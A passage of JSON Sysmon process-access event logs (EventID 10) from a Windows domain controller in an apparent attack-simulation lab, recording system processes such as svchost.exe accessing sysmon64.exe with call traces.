:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffed80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffed80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5c25dc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5bd0eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a05e1","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010D4EC0700}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010D4EC0700}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C: